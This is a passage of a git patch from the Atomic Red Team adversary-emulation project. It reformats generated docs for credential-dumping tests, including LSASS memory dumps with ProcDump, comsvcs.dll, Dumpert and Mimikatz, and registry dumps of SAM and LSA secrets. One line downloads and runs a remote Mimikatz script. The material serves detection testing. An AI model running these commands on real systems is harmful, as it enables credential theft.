.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file From 36d49de4c8b00bf36054294b4a1fcbab3917d7c5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 17:04:33 +0000 Subject: [PATCH 68/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.md | 96 ++++++++++------- atomics/T1003.002/T1003.002.md | 32 +++--- atomics/T1003.003/T1003.003.md | 48 +++++---- atomics/T1003.004/T1003.004.md | 8 +- atomics/T1003.006/T1003.006.md | 8 +- atomics/T1003.007/T1003.007.md | 16 +-- atomics/T1003.008/T1003.008.md | 16 +-- atomics/T1003/T1003.md | 16 +-- atomics/T1006/T1006.md | 8 +- atomics/T1007/T1007.md | 16 +-- atomics/T1010/T1010.md | 8 +- atomics/T1012/T1012.md | 8 +- atomics/T1014/T1014.md | 24 +++-- atomics/T1016/T1016.md | 64 ++++++----- atomics/T1018/T1018.md | 88 +++++++++------ atomics/T1020/T1020.md | 8 +- atomics/T1021.001/T1021.001.md | 16 +-- atomics/T1021.002/T1021.002.md | 32 +++--- atomics/T1021.003/T1021.003.md | 8 +- atomics/T1021.006/T1021.006.md | 24 +++-- atomics/T1027.001/T1027.001.md | 8 +- atomics/T1027.002/T1027.002.md | 32 +++--- atomics/T1027.004/T1027.004.md | 16 +-- atomics/T1027/T1027.md | 48 +++++---- atomics/T1030/T1030.md | 8 +- atomics/T1033/T1033.md | 24 +++-- atomics/T1036.003/T1036.003.md | 72 ++++++++----- atomics/T1036.004/T1036.004.md | 16 +-- atomics/T1036.005/T1036.005.md | 8 +- atomics/T1036.006/T1036.006.md | 8 +- atomics/T1036/T1036.md | 8 +- atomics/T1037.001/T1037.001.md | 8 +- atomics/T1037.002/T1037.002.md | 8 +- atomics/T1037.004/T1037.004.md | 24 +++-- atomics/T1037.005/T1037.005.md | 8 +- atomics/T1040/T1040.md | 32 +++--- atomics/T1046/T1046.md | 32 +++--- atomics/T1047/T1047.md | 64 ++++++----- atomics/T1048.003/T1048.003.md | 40 ++++--- atomics/T1048/T1048.md | 16 +-- atomics/T1049/T1049.md | 32 +++--- atomics/T1053.001/T1053.001.md | 8 +- atomics/T1053.002/T1053.002.md | 8 +- atomics/T1053.003/T1053.003.md | 24 +++-- atomics/T1053.004/T1053.004.md | 8 +- atomics/T1053.005/T1053.005.md | 48 +++++---- atomics/T1053.006/T1053.006.md | 8 +- atomics/T1053.007/T1053.007.md | 16 +-- atomics/T1055.001/T1055.001.md | 8 +- atomics/T1055.004/T1055.004.md | 8 +- atomics/T1055.012/T1055.012.md | 16 +-- atomics/T1055/T1055.md | 16 +-- atomics/T1056.001/T1056.001.md | 16 +-- atomics/T1056.002/T1056.002.md | 16 +-- atomics/T1056.004/T1056.004.md | 8 +- atomics/T1057/T1057.md | 16 +-- atomics/T1059.001/T1059.001.md | 144 +++++++++++++++---------- atomics/T1059.002/T1059.002.md | 8 +- atomics/T1059.003/T1059.003.md | 16 +-- atomics/T1059.004/T1059.004.md | 16 +-- atomics/T1059.005/T1059.005.md | 24 +++-- atomics/T1059.006/T1059.006.md | 24 +++-- atomics/T1069.001/T1069.001.md | 24 +++-- atomics/T1069.002/T1069.002.md | 64 ++++++----- atomics/T1070.001/T1070.001.md | 24 +++-- atomics/T1070.002/T1070.002.md | 24 +++-- atomics/T1070.003/T1070.003.md | 88 +++++++++------ atomics/T1070.004/T1070.004.md | 80 ++++++++------ atomics/T1070.005/T1070.005.md | 24 +++-- atomics/T1070.006/T1070.006.md | 64 ++++++----- atomics/T1070/T1070.md | 8 +- atomics/T1071.001/T1071.001.md | 24 +++-- atomics/T1071.004/T1071.004.md | 32 +++--- atomics/T1072/T1072.md | 8 +- atomics/T1074.001/T1074.001.md | 24 +++-- atomics/T1078.001/T1078.001.md | 8 +- atomics/T1078.003/T1078.003.md | 8 +- atomics/T1082/T1082.md | 88 +++++++++------ atomics/T1083/T1083.md | 32 +++--- atomics/T1087.001/T1087.001.md | 88 +++++++++------ atomics/T1087.002/T1087.002.md | 80 ++++++++------ atomics/T1090.001/T1090.001.md | 24 +++-- atomics/T1095/T1095.md | 24 +++-- atomics/T1098.004/T1098.004.md | 8 +- atomics/T1098/T1098.md | 16 +-- atomics/T1105/T1105.md | 112 +++++++++++-------- atomics/T1106/T1106.md | 8 +- atomics/T1110.001/T1110.001.md | 16 +-- atomics/T1110.002/T1110.002.md | 8 +- atomics/T1110.003/T1110.003.md | 24 +++-- atomics/T1110.004/T1110.004.md | 16 +-- atomics/T1112/T1112.md | 48 +++++---- atomics/T1113/T1113.md | 40 ++++--- atomics/T1114.001/T1114.001.md | 8 +- atomics/T1115/T1115.md | 32 +++--- atomics/T1119/T1119.md | 32 +++--- atomics/T1120/T1120.md | 8 +- atomics/T1123/T1123.md | 8 +- atomics/T1124/T1124.md | 16 +-- atomics/T1127.001/T1127.001.md | 16 +-- atomics/T1132.001/T1132.001.md | 8 +- atomics/T1133/T1133.md | 8 +- atomics/T1134.001/T1134.001.md | 16 +-- atomics/T1134.004/T1134.004.md | 40 ++++--- atomics/T1135/T1135.md | 48 +++++---- atomics/T1136.001/T1136.001.md | 48 +++++---- atomics/T1136.002/T1136.002.md | 24 +++-- atomics/T1137.002/T1137.002.md | 8 +- atomics/T1137.004/T1137.004.md | 8 +- atomics/T1137/T1137.md | 8 +- atomics/T1140/T1140.md | 16 +-- atomics/T1176/T1176.md | 32 +++--- atomics/T1197/T1197.md | 32 +++--- atomics/T1201/T1201.md | 56 ++++++---- atomics/T1202/T1202.md | 24 +++-- atomics/T1204.002/T1204.002.md | 64 ++++++----- atomics/T1207/T1207.md | 8 +- atomics/T1216.001/T1216.001.md | 8 +- atomics/T1216/T1216.md | 16 +-- atomics/T1217/T1217.md | 56 ++++++---- atomics/T1218.001/T1218.001.md | 56 ++++++---- atomics/T1218.002/T1218.002.md | 8 +- atomics/T1218.003/T1218.003.md | 16 +-- atomics/T1218.004/T1218.004.md | 64 ++++++----- atomics/T1218.005/T1218.005.md | 72 ++++++++----- atomics/T1218.007/T1218.007.md | 24 +++-- atomics/T1218.008/T1218.008.md | 8 +- atomics/T1218.009/T1218.009.md | 16 +-- atomics/T1218.010/T1218.010.md | 40 ++++--- atomics/T1218.011/T1218.011.md | 64 ++++++----- atomics/T1218/T1218.md | 64 ++++++----- atomics/T1219/T1219.md | 24 +++-- atomics/T1220/T1220.md | 32 +++--- atomics/T1221/T1221.md | 8 +- atomics/T1222.001/T1222.001.md | 40 ++++--- atomics/T1222.002/T1222.002.md | 72 ++++++++----- atomics/T1482/T1482.md | 40 ++++--- atomics/T1485/T1485.md | 16 +-- atomics/T1486/T1486.md | 32 +++--- atomics/T1489/T1489.md | 24 +++-- atomics/T1490/T1490.md | 56 ++++++---- atomics/T1491.001/T1491.001.md | 8 +- atomics/T1496/T1496.md | 8 +- atomics/T1497.001/T1497.001.md | 24 +++-- atomics/T1505.002/T1505.002.md | 8 +- atomics/T1505.003/T1505.003.md | 8 +- atomics/T1518.001/T1518.001.md | 48 +++++---- atomics/T1518/T1518.md | 24 +++-- atomics/T1529/T1529.md | 72 ++++++++----- atomics/T1531/T1531.md | 24 +++-- atomics/T1543.001/T1543.001.md | 8 +- atomics/T1543.002/T1543.002.md | 16 +-- atomics/T1543.003/T1543.003.md | 24 +++-- atomics/T1543.004/T1543.004.md | 8 +- atomics/T1546.001/T1546.001.md | 8 +- atomics/T1546.002/T1546.002.md | 8 +- atomics/T1546.003/T1546.003.md | 8 +- atomics/T1546.004/T1546.004.md | 16 +-- atomics/T1546.005/T1546.005.md | 8 +- atomics/T1546.007/T1546.007.md | 8 +- atomics/T1546.008/T1546.008.md | 16 +-- atomics/T1546.010/T1546.010.md | 8 +- atomics/T1546.011/T1546.011.md | 24 +++-- atomics/T1546.012/T1546.012.md | 16 +-- atomics/T1546.013/T1546.013.md | 8 +- atomics/T1546.014/T1546.014.md | 8 +- atomics/T1547.001/T1547.001.md | 56 ++++++---- atomics/T1547.004/T1547.004.md | 24 +++-- atomics/T1547.005/T1547.005.md | 8 +- atomics/T1547.006/T1547.006.md | 8 +- atomics/T1547.007/T1547.007.md | 16 +-- atomics/T1547.009/T1547.009.md | 16 +-- atomics/T1547.010/T1547.010.md | 8 +- atomics/T1547.011/T1547.011.md | 8 +- atomics/T1548.001/T1548.001.md | 24 +++-- atomics/T1548.002/T1548.002.md | 72 ++++++++----- atomics/T1548.003/T1548.003.md | 24 +++-- atomics/T1550.002/T1550.002.md | 16 +-- atomics/T1550.003/T1550.003.md | 8 +- atomics/T1552.001/T1552.001.md | 40 ++++--- atomics/T1552.002/T1552.002.md | 16 +-- atomics/T1552.003/T1552.003.md | 8 +- atomics/T1552.004/T1552.004.md | 32 +++--- atomics/T1552.006/T1552.006.md | 16 +-- atomics/T1552.007/T1552.007.md | 16 +-- atomics/T1553.001/T1553.001.md | 8 +- atomics/T1553.004/T1553.004.md | 40 ++++--- atomics/T1553.005/T1553.005.md | 16 +-- atomics/T1555.001/T1555.001.md | 8 +- atomics/T1555.003/T1555.003.md | 24 +++-- atomics/T1555/T1555.md | 24 +++-- atomics/T1556.002/T1556.002.md | 8 +- atomics/T1558.001/T1558.001.md | 8 +- atomics/T1558.003/T1558.003.md | 8 +- atomics/T1559.002/T1559.002.md | 24 +++-- atomics/T1560.001/T1560.001.md | 64 ++++++----- atomics/T1560.002/T1560.002.md | 32 +++--- atomics/T1560/T1560.md | 8 +- atomics/T1562.001/T1562.001.md | 192 ++++++++++++++++++++------------- atomics/T1562.002/T1562.002.md | 32 +++--- atomics/T1562.003/T1562.003.md | 16 +-- atomics/T1562.004/T1562.004.md | 56 ++++++---- atomics/T1562.006/T1562.006.md | 16 +-- atomics/T1563.002/T1563.002.md | 8 +- atomics/T1564.001/T1564.001.md | 56 ++++++---- atomics/T1564.002/T1564.002.md | 16 +-- atomics/T1564.003/T1564.003.md | 8 +- atomics/T1564.004/T1564.004.md | 32 +++--- atomics/T1564/T1564.md | 24 +++-- atomics/T1566.001/T1566.001.md | 16 +-- atomics/T1569.001/T1569.001.md | 8 +- atomics/T1569.002/T1569.002.md | 16 +-- atomics/T1571/T1571.md | 16 +-- atomics/T1573/T1573.md | 8 +- atomics/T1574.001/T1574.001.md | 8 +- atomics/T1574.002/T1574.002.md | 8 +- atomics/T1574.006/T1574.006.md | 16 +-- atomics/T1574.009/T1574.009.md | 8 +- atomics/T1574.011/T1574.011.md | 16 +-- atomics/T1574.012/T1574.012.md | 24 +++-- atomics/T1609/T1609.md | 8 +- atomics/T1610/T1610.md | 8 +- atomics/T1611/T1611.md | 8 +- 223 files changed, 3625 insertions(+), 2175 deletions(-) diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 9869cc02..024dd2aa 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -54,9 +54,6 @@ The following SSPs can be used to access credentials:
## Atomic Test #1 - Windows Credential Editor - -auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed - Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. @@ -64,9 +61,14 @@ Upon successful execution, you should see a file with user passwords/hashes at % If you see no output it is likely that execution was blocked by Anti-Virus. If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed + + + #### Inputs: @@ -117,18 +119,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump - -auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 + + + #### Inputs: @@ -174,15 +178,17 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll - -auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be + + + @@ -206,18 +212,20 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking - -auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d + + + #### Inputs: @@ -260,14 +268,16 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager - -auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. + **Supported Platforms:** Windows +**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607 + + + #### Run it with these steps! @@ -292,14 +302,16 @@ Manager and administrative permissions.
## Atomic Test #6 - Offline Credential Theft With Mimikatz - -auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 - The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. + **Supported Platforms:** Windows +**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023 + + + #### Inputs: @@ -358,17 +370,19 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
## Atomic Test #7 - LSASS read with pypykatz - -auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8 - Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8 + + + @@ -421,15 +435,17 @@ pip install pypykatz
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 - -auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 - The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781 + + + @@ -454,18 +470,20 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump - -auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b + + + #### Inputs: @@ -510,16 +528,18 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #10 - Powershell Mimikatz - -auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc - Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" + **Supported Platforms:** Windows +**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + + + #### Inputs: @@ -544,14 +564,16 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe - -auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 - This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass + **Supported Platforms:** Windows +**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 + + + #### Inputs: @@ -597,17 +619,19 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs - -auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697 + + + #### Inputs: diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 73f20f13..ad162a55 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -36,16 +36,18 @@ Notes:
## Atomic Test #1 - Registry dump of SAM, creds, and secrets - -auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44 - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44 + + + @@ -73,13 +75,15 @@ del %temp%\security >nul 2> nul
## Atomic Test #2 - Registry parse with pypykatz - -auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - Parses registry hives to obtain stored credentials + **Supported Platforms:** Windows +**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263 + + + @@ -132,14 +136,16 @@ pip install pypykatz
